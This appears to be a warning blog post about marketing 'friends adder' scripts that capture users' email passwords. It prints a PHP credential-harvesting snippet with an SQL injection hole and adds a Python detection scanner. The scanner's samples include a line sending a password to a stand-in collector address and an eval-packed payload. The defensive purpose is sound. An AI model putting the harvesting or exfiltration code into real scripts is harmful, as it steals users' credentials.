
You Could Be My ATM With One Line Of Code


How many of us have thought it would be great to have our own cash machine sitting in the living room? Well, today potentially we all can. The "spam all your friends" scripts are still doing the rounds, much to my horror, and so I wanted to show you just how easy it is for unscrupulous marketers, or indeed developers, to capture the username and password for your email account.

Your World Ruined with one line of code

Just think about it for a moment: what private details are in that account? Your PayPal account, perhaps? Hmm, what about your bank details…

In this day and age your email is the effective way into your life. Never give your password away. Even your administrators will never ask for your password: if they really are your email admin, they already have back-end access.

I really want to drive home how potentially dangerous these scripts can be, but I think Andy has done a good job with How to Screw Up Your Business, a must read for all marketers thinking of using such features.

So how would a marketer or developer screw up your business?

// Malicious addition to a "friends adder" script: the form fields the
// victim has just submitted, including the password to their email account
$name = $_POST['importername'];
$email = $_POST['email'];
$password = $_POST['password'];
$description = $_POST['description'];

// Write the captured credentials, in clear text, to the marketer's own table.
// The values are concatenated straight into the query, so these lines also
// leave the marketer's database open to SQL injection.
$SQL = " INSERT INTO cashmachine ";
$SQL = $SQL . " (name, email, password) VALUES ";
$SQL = $SQL . " ('$name', '$email', '$password')";
$result = mysql_db_query($db, "$SQL");

Those few lines of code, added to the friends adder script by the marketer or even by the developer, will happily store your details in a database for their pleasure…
Are people doing this right now? Someone will be. It might not be the marketer who asked for your password, though: many PHP scripts are delivered encrypted, and what is lurking behind there? A call to another server, perhaps?
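As an added example (not code from the post or from any friends adder script), here is a small Python check that looks for exactly this pattern in a PHP script you are asked to install: a value derived from the submitted password ending up in a database write or an outbound call, plus a flag for eval/base64 packing that hides the code from review. The four sample scripts, the hypothetical collector address 203.0.113.9 and the sink and obfuscation function lists are constructed for the example; it is a heuristic that only reads plain source, not a proof that a script is safe.

```python
import re

# Constructed sample scripts. harvester.php is the post's pattern; the others
# are hypothetical variants a reviewer might meet.
SAMPLES = {
    "clean_adder.php": """<?php
$email = $_POST['email'];
$password = $_POST['password'];
$imap = imap_open('{imap.example.com:993/imap/ssl}', $email, $password);
$contacts = fetch_contacts($imap);
""",
    "harvester.php": """<?php
$name = $_POST['importername'];
$email = $_POST['email'];
$password = $_POST['password'];
$SQL = " INSERT INTO cashmachine ";
$SQL = $SQL . " (name, email, password) VALUES ";
$SQL = $SQL . " ('$name', '$email','$password')";
$result = mysql_db_query($db,"$SQL");
""",
    "phone_home.php": """<?php
$pw = $_POST['password'];
$u = $_POST['email'];
file_get_contents('http://203.0.113.9/c.php?u=' . urlencode($u) . '&p=' . urlencode($pw));
""",
    "packed.php": """<?php
eval(gzinflate(base64_decode('eJxLLS8vBwADMwFA')));
""",
}

# Where a value can leave the script: database writes and outbound calls.
# mail() is included because emailing the password to the script owner is the
# simplest possible "phone home".
SINKS = {
    "stored in a database": re.compile(
        r"\b(mysql_db_query|mysql_query|mysqli_query|pg_query)\s*\(|->(query|execute|exec)\s*\("),
    "sent to another server": re.compile(
        r"\b(file_get_contents|fopen|fsockopen|curl_setopt|curl_exec|mail)\s*\("),
}
# Wrappers that hide code from a reader: flagged, never cleared.
OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
# Taint source: the password the user typed into the form.
SOURCE = re.compile(r"\$_(POST|GET|REQUEST)\s*\[\s*['\"]password['\"]\s*\]")
# Simple PHP assignment, including the .= concatenation form.
ASSIGN = re.compile(r"^\s*\$(\w+)\s*(?:\.?=)\s*(.*)$")


def _mentions(text, tainted):
    """True if text reads the password field or any variable derived from it."""
    if SOURCE.search(text):
        return True
    return any(re.search(r"\$" + re.escape(v) + r"\b", text) for v in tainted)


def scan(source):
    """Return human-readable findings for one PHP script (empty list if none)."""
    lines = source.splitlines()
    tainted = set()
    # Propagate taint through assignments until nothing changes, so
    # $SQL = $SQL . "'$password'" followed by mysql_db_query($db, "$SQL")
    # is caught even though the sink never names $password directly.
    changed = True
    while changed:
        changed = False
        for line in lines:
            m = ASSIGN.match(line)
            if m and m.group(1) not in tainted and _mentions(m.group(2), tainted):
                tainted.add(m.group(1))
                changed = True
    findings = []
    for no, line in enumerate(lines, 1):
        ob = OBFUSCATION.search(line)
        if ob:
            findings.append(f"line {no}: obfuscated code ({ob.group(1)}), cannot be reviewed")
        for what, pat in SINKS.items():
            m = pat.search(line)
            if m and _mentions(line, tainted):
                findings.append(f"line {no}: password-derived value {what} via {m.group(0).rstrip('( ')}")
    return findings


def scan_all(samples):
    """Map each file name to its findings."""
    return {name: scan(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, found in scan_all(SAMPLES).items():
        print(name, "->", found or "no findings")
```

Using the password to log in to the IMAP server (clean_adder.php) is not flagged, because that is what the victim expects the script to do; only storing it or sending it elsewhere is reported. An encoded or eval-packed script gets an "obfuscated, cannot be reviewed" finding rather than a clean bill, which is the honest answer to the post's closing question.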